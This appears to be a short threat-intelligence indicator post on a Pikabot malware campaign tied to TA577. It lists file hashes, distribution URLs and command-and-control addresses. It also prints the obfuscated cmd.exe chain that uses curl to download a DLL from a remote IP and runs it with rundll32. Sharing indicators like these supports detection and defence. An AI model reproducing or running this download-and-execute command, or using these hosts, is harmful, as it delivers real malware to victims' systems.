25.10.2023 | Pikabot | TA577 | 1.1.15-ghost
*************************************************
.url https://obikua.com/tr/?1
.zip bb814925998eddbbb788971d1ca0072949493d433299ba65e2c8511d283106aa
.dll dbdd22025131eebe52efc5fbe70e2e87723ff1934c808901bbb176f6130f23f6
*************************************************
url > zip > js > curl > dll
wscript.exe C:\Users\Admin\AppData\Local\Temp\Main420.js
cmd.exe /c jQ || echO jQ & PINg jQ || CURl http://49.13.119.72/jHuAT/Regul -o %tMp%\jQ.dlld & PINg -n 2 jQ || RUndlL32 %tMp%\jQ.dlld, Crash & EXiT LELtUTtZCSu
PINg jQ
CURl http://49.13.119.72/jHuAT/Regul -o C:\Users\Admin\AppData\Local\Temp\jQ.dlld
PINg -n 2 jQ
RUndlL32 C:\Users\Admin\AppData\Local\Temp\jQ.dlld, Crash
*************************************************
distro url
https://obikua.com/tr/?1
*************************************************
.dll distro
http://45.63.90.172/51kp/count
http://208.83.233.168/hjZ21/Ontogw
*************************************************
c2's
139.177.198.199:2226
103.231.93.15:5631
154.92.19.139:2222
45.79.147.119:9785
172.234.29.13:2224
HTTPS Checking Traffic